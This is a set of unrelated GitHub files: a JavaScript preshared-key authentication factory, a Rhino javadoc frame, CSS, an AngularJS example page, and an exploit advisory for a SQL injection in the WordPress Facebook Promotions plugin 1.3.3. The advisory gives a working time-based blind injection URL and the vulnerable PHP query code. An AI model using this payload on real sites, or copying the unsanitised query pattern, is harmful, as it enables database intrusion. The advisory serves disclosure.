EntityAuthenticationScheme.PSK_PROFILE); // The properties. var props = { store: { value: store, writable: false, enumerable: false, configurable: false }, authutils: { value: authutils, writable: false, enumerable: false, configurable: false }, }; Object.defineProperties(this, props); }, /** @inheritDoc */ createData: function createData(ctx, entityAuthMo, callback) { AsyncExecutor(callback, function() { return PresharedProfileAuthenticationData.parse(entityAuthMo); }); }, /** @inheritDoc */ getCryptoContext: function getCryptoContext(ctx, authdata) { // Make sure we have the right kind of entity authentication data. if (!(authdata instanceof PresharedProfileAuthenticationData)) throw new MslInternalException("Incorrect authentication data type " + authdata + "."); var ppad = authdata; // Check for revocation. var pskId = ppad.presharedKeysId; if (this.authutils.isEntityRevoked(pskId)) throw new MslEntityAuthException(MslError.ENTITY_REVOKED, "psk profile " + pskId).setEntityAuthenticationData(ppad); // Verify the scheme is permitted. if (!this.authutils.isSchemePermitted(pskId, this.scheme)) throw new MslEntityAuthException(MslError.INCORRECT_ENTITYAUTH_DATA, "Authentication scheme for entity " + pskId + " not supported:" + this.scheme).setEntityAuthenticationData(ppad); // Load key set. var keys = this.store.getKeys(pskId); if (!keys) throw new MslEntityAuthException(MslError.ENTITY_NOT_FOUND, "psk profile " + pskId).setEntityAuthenticationData(ppad); // Return the crypto context. var identity = ppad.getIdentity(); return new SymmetricCryptoContext(ctx, identity, keys.encryptionKey, keys.hmacKey, keys.wrappingKey); }, }); })(require, (typeof module !== 'undefined') ? module : mkmodule('PresharedProfileAuthenticationFactory'));
{ "pile_set_name": "Github" }
# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability # Date: 2011-08-28 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip # Version: 1.3.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'";
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0-google-v3) on Mon May 09 20:04:52 EDT 2011 --> <TITLE> org.mozilla.javascript.optimizer (Rhino) </TITLE> <META NAME="date" CONTENT="2011-05-09"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../org/mozilla/javascript/optimizer/package-summary.html" target="classFrame">org.mozilla.javascript.optimizer</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="ClassCompiler.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">ClassCompiler</A> <BR> <A HREF="Codegen.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">Codegen</A> <BR> <A HREF="OptRuntime.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">OptRuntime</A> <BR> <A HREF="OptRuntime.GeneratorState.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">OptRuntime.GeneratorState</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
{ "pile_set_name": "Github" }
.rightFavorite:host { display: block; --box-border-radius: 1px; --link-primary-color: #778087; --link-visited-color: #afb9c1; --link-primary-hover-color: #4d5256; } div.rightFavorite.node { background-color: transparent; border-radius: var(--box-border-radius); box-shadow: none; font-size: 14px; margin: 0px -10px 0px -10px; padding: 5px 10px 5px 10px; } div.rightFavorite.node .rightFavorite.node_compose { float: right; visibility: hidden; margin: 3px 0px 0px 0px; } div.rightFavorite.node:hover { background-color: #f5f5f5; box-shadow: 0px 1px 4px rgba(0, 0, 0, 0.1) inset; } div.rightFavorite.node:hover .rightFavorite.node_compose { float: right; visibility: visible; } div.rightFavorite#avatar { width: 24px; height: 24px; background-size: 24px 24px; background-repeat: no-repeat; display: inline-block; vertical-align: middle; }
{ "pile_set_name": "Github" }
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Example - example-example17-jquery</title> <script src="../../components/jquery-2.1.1/jquery.js"></script> <script src="../../../angular.js"></script> <script src="script.js"></script> </head> <body ng-app="docsTransclusionExample"> <div ng-controller="Controller"> <my-dialog>Check out the contents, {{name}}!</my-dialog> </div> </body> </html>
{ "pile_set_name": "Github" }